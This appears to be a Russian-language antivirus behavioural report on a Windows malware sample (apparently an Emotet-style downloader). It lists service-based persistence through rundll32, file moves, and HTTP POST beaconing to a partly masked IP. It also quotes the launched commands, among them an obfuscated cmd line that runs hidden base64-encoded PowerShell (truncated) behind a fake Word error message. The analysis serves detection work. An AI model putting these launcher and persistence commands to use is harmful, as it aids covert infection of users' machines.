Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\lonkxfoo.gdj] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\lonkxfoo.gdj] 'ImagePath' = '%WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Ktjuqoqem\lonkxfoo.gdj",Control_RunDLL'
Создает следующие сервисы
- 'lonkxfoo.gdj' %WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Ktjuqoqem\lonkxfoo.gdj",Control_RunDLL
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\d9e9u9i\ffnhdak\a05d.dll
Удаляет следующие файлы
- %WINDIR%\syswow64\ktjuqoqem\lonkxfoo.gdj
Перемещает следующие файлы
- %HOMEPATH%\d9e9u9i\ffnhdak\a05d.dll в %WINDIR%\syswow64\ktjuqoqem\lonkxfoo.gdj
Сетевая активность
Подключается к
- '12#.#.215.60':80
TCP
Запросы HTTP GET
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
Запросы HTTP POST
- http://12#.#.215.60/d001qzuf0sjt3/imd910/wsvicsldvv/ej38ew5izutf8p1mo74/
UDP
- DNS ASK ob#b.tv
- DNS ASK cr#.#ectigo.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYAS...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\D9e9u9i\Ffnhdak\A05D.dll Control_RunDLL
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\Ktjuqoqem\lonkxfoo.gdj",Control_RunDLL
